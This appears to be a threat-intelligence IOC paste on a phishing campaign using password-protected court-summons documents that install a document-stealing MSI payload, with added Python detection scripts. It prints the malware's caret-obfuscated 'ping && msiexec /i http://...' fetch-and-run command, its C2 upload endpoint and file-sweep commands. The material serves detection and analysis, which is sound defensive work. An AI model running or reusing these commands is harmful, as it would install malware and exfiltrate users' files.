VRad

#autoit_240721

Aug 5th, 2021 (edited)
#IOC #OptiData #VR #Autoit #MSI #CDFv2

https://pastebin.com/qHHUgBNK

previous_contact:
12/04/21 https://pastebin.com/yBpP4PPw

FAQ:
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083

attack_vector
--------------
email > attached password-protected .doc & .xlam (CDF V2 containers) > recipient enters password, file decrypts > VBA macro > cmd.exe: ping delay, then msiexec /i GET of remote MSI > drops %appdata%\Josh Close\CsvHelper\csvhelper.exe > recursive DIR sweep of user documents > exfil via HTTP POST to 45.146.165.91:8080/upld/

files
--------------
SHA-256 4acfcccf535da0686c8343c7eeb0c450e6021fca20a9b1a02211aaf0e6c9dc13
File name Повістка_до суду - Михайло Васильович №3.doc (en: "Summons_to court - Mykhailo Vasylovych No. 3.doc") [ CDF V2 Document ] - wrong password or corrupted file; contents could not be extracted
File size 263.50 KB (269824 bytes)

SHA-256 882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07
File name копії судових документів - Мих.xlam (en: "copies of court documents - Mykh.xlam") [ CDF V2 Document ] - password-encrypted container as attached
File size 22.00 KB (22528 bytes)

SHA-256 8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a
File name копії судових документів - Мих.xlam [ Office Open XML Spreadsheet ] - same file after decryption
File size 15.79 KB (16164 bytes)

SHA-256 e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909
File name 240721-1.msi [ Windows Installer ]
File size 6.46 MB (6770688 bytes)

SHA-256 700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901
File name se1.exe [ PE32 executable for MS Windows ] compiler signature: BobSoft Mini Delphi -> BoB / BobSoft
File size 16.47 MB (17274187 bytes)

SHA-256 17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f
File name csvhelper.exe [ PE32 executable for MS Windows ]
File size 6.93 MB (7266816 bytes)

activity
**************
PL_SCR http://2215.site/240721-1.msi

C2 45.146.165.91:8080/upld/


netwrk
--------------
45.146.165.91 2215.site GET /240721-1.msi HTTP/1.1 Windows Installer
45.146.165.91 45.146.165.91:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0

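The two netwrk entries above give both an exact-match and a behavioural detection surface: the payload host/path, and a POST to /upld/<8-hex id> with the non-standard Content-Type application/upload and a Mozilla/4.0 UA. The following is an added example (not part of the original paste) that matches those indicators against proxy log lines. The tab-separated log format and every line except the two mirroring the report are constructed for illustration; only the 45.146.165.91 / 2215.site / /240721-1.msi / /upld/ values come from the report.

```python
"""Match the network indicators from the activity/netwrk sections above
against proxy log lines.

Added example, not part of the original paste. The log line format
(tab-separated: src_ip, host, method, path, user_agent, content_type) and
all lines except the two mirroring the report are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Exact indicators taken from the report.
IOC_HOSTS = {"45.146.165.91", "2215.site"}
IOC_PATHS = {"/240721-1.msi"}
# Exfil uploads went to /upld/<8 uppercase hex chars> (observed: /upld/AC38D1C7).
UPLD_RE = re.compile(r"^/upld/[0-9A-F]{8}$")


@dataclass
class HttpEvent:
    src_ip: str
    host: str          # Host header, may carry :port
    method: str
    path: str
    user_agent: str
    content_type: str  # "-" when absent


def parse_line(line: str) -> HttpEvent:
    """Parse one tab-separated proxy log line (constructed format)."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields, got {len(fields)}: {line!r}")
    return HttpEvent(*fields)


def classify(ev: HttpEvent) -> list[str]:
    """Return reasons this event is suspicious; 'ioc:' = exact indicator,
    'behav:' = behavioural pattern that can also fire on benign traffic."""
    hits: list[str] = []
    hostname = ev.host.rsplit(":", 1)[0]          # strip :port
    if hostname in IOC_HOSTS:
        hits.append(f"ioc: host {hostname}")
    if ev.path in IOC_PATHS:
        hits.append(f"ioc: payload path {ev.path}")
    if ev.method == "POST" and UPLD_RE.match(ev.path):
        hits.append("behav: POST to /upld/<8-hex id>")
    if ev.method == "POST" and ev.content_type == "application/upload":
        hits.append("behav: non-standard Content-Type application/upload")
    if ev.user_agent == "Windows Installer" and ev.path.lower().endswith(".msi"):
        # msiexec fetching an MSI over HTTP; legitimate deployments do this too,
        # so treat it as corroborating evidence rather than a verdict.
        hits.append("behav: msiexec fetching remote MSI")
    return hits


def scan(log_text: str) -> dict[int, list[str]]:
    """Classify every non-empty line; key is the 0-based line index."""
    return {i: classify(parse_line(line))
            for i, line in enumerate(log_text.splitlines()) if line.strip()}


# Constructed sample log: lines 0 and 1 mirror the report's netwrk entries,
# lines 2 and 3 are benign traffic (line 3 deliberately trips only the
# behavioural msiexec rule, to show why that rule is not a verdict on its own).
SAMPLE_LOG = (
    "10.0.0.5\t2215.site\tGET\t/240721-1.msi\tWindows Installer\t-\n"
    "10.0.0.5\t45.146.165.91:8080\tPOST\t/upld/AC38D1C7\tMozilla/4.0\tapplication/upload\n"
    "10.0.0.7\twww.example.com\tGET\t/index.html\tMozilla/5.0\t-\n"
    "10.0.0.7\tupdates.example.net\tGET\t/setup.msi\tWindows Installer\t-\n"
)

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons or "clean")
```

Exact indicators age quickly (the host and MSI name will change per campaign), so the behavioural checks on the upload path shape, the odd Content-Type and the msiexec fetch are the part worth keeping in a detection rule; treat a lone msiexec-fetches-MSI hit as context, not an alert.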
comp
--------------
msiexec.exe 2504 TCP 45.146.165.91 80 ESTABLISHED
csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED

proc
--------------
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Windows\SysWOW64\cmd.exe /c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn
(caret-obfuscated; cmd.exe reads it as: ping 127.0.0.1 -n 66 > nul && msiexec /i http://2215.site/240721-1.msi /qn)
C:\Windows\SysWOW64\PING.EXE 127.0.0.1 -n 66
C:\Windows\SysWOW64\msiexec.exe /i http://2215.site/240721-1.msi /qn


C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe -Embedding 5603E1E9BABB29850E6EDC59A79FB67D
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\tmp\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe

C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
...
C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A

C:\Windows\SysWOW64\cmd.exe cmd /c start /min r.bat
C:\Windows\system32\cmd.exe /K r.bat
C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\r.bat"
C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F

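The proc section shows the pattern a process-creation rule should catch: Excel spawning cmd.exe, a caret-obfuscated command line that uses ping to loopback as a sleep before chaining into msiexec /i with a remote URL, and later cmd /U /C DIR "...\*.<ext>" /S /B /A sweeps for documents. Below is an added example (not part of the original paste) that first undoes the caret escaping the way cmd.exe does, then runs those rules over constructed process events. The event dicts mirror the report's command lines, but the field names (parent, image, cmdline) are an assumed schema, not a real Sysmon/EDR one, and the parent chosen for the DIR command is an assumption the report does not state.

```python
"""Flag the process-creation pattern from the proc section above:
Office -> cmd.exe with caret-obfuscated 'ping ... > nul && msiexec /i http...',
then recursive DIR sweeps for user documents.

Added example, not part of the original paste. The event dicts are
constructed to mirror the report's command lines; the field names
(parent, image, cmdline) and the parent of the DIR command are assumptions,
not a real Sysmon/EDR schema.
"""
from __future__ import annotations

import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
DOC_EXTS = ("doc", "docx", "xls", "xlsx", "pdf", "txt", "zip", "rar", "7z")


def decaret(cmd: str) -> str:
    """Undo cmd.exe caret escaping: outside double quotes a caret makes the
    next character literal (so P^i^ng -> Ping and ^^ -> ^); inside quotes
    it is an ordinary character and is kept."""
    out: list[str] = []
    in_quotes = False
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmd):       # a trailing caret escapes nothing
                out.append(cmd[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


# Rules run against the de-obfuscated command line, case-insensitively.
RULES = [
    ("msiexec_remote_install",        # msiexec /i http(s)://... (quiet or not)
     re.compile(r"\bmsiexec(?:\.exe)?\b[^&|]*\s/i\s+https?://", re.I)),
    ("ping_sleep_then_chain",         # ping loopback as a sleep, then && next stage
     re.compile(r"\bping(?:\.exe)?\b\s+127\.0\.0\.1\s+-n\s+\d+\s*>\s*nul\s*&&", re.I)),
    ("dir_document_sweep",            # DIR "<path>\*.<doc ext>" /S /B /A
     re.compile(r'\bdir\b\s+"?[^"]*\*\.(?:' + "|".join(DOC_EXTS) + r')"?(?:\s+/[sba])+', re.I)),
]


def detect(event: dict[str, str]) -> list[str]:
    """Return the sorted rule names that fire for one process-creation event."""
    raw = event["cmdline"]
    clean = decaret(raw)
    fired = [name for name, rx in RULES if rx.search(clean)]
    if clean != raw:                  # any unquoted caret is itself a signal
        fired.append("caret_obfuscation")
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent in OFFICE_IMAGES and image == "cmd.exe":
        fired.append("office_spawns_cmd")
    return sorted(fired)


def scan(events: list[dict[str, str]]) -> list[list[str]]:
    return [detect(e) for e in events]


# Constructed events: 0-2 mirror the report's proc section, 3 is benign.
EVENTS = [
    {"parent": r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"msiexec /i http://2215.site/240721-1.msi /qn"},
    {"parent": r"C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe",  # assumed parent
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /U /C DIR "\Users\operator\*.pdf" /S /B /A'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c dir C:\Users\operator\Documents"},
]

if __name__ == "__main__":
    for ev, hits in zip(EVENTS, scan(EVENTS)):
        print(ntpath.basename(ev["image"]), hits or "clean")
```

Normalising the command line before matching matters more than the individual regexes: a rule written against the literal m^S^Ie^X^e^C string would miss the next sample that sprinkles carets differently, while a rule on the de-escaped text keeps working, and the presence of unquoted carets can be scored on its own.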
persist
--------------
n/a

drop
--------------
%tmp%\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
%appdata%\Josh Close\CsvHelper\csvhelper.exe

# # #
VT details
https://www.virustotal.com/gui/file/8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a/details
https://www.virustotal.com/gui/url/5cb4eaeb4d3c3a0d086bcc60b1f4a2d0247cbb78a14f5818e1ae3681b3c75aab/details
https://urlscan.io/result/ddba54d9-71b0-447e-8882-3c4f1cecb4f2/
https://www.virustotal.com/gui/file/e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909/details
https://www.virustotal.com/gui/file/700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901/details
https://www.virustotal.com/gui/file/17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f/details
https://analyze.intezer.com/analyses/8fc75e5a-ef6e-48a1-8510-e8945272b9dc
https://analyze.intezer.com/analyses/fc99be4a-a1aa-4c62-a31c-630fd2a5bfbc

VR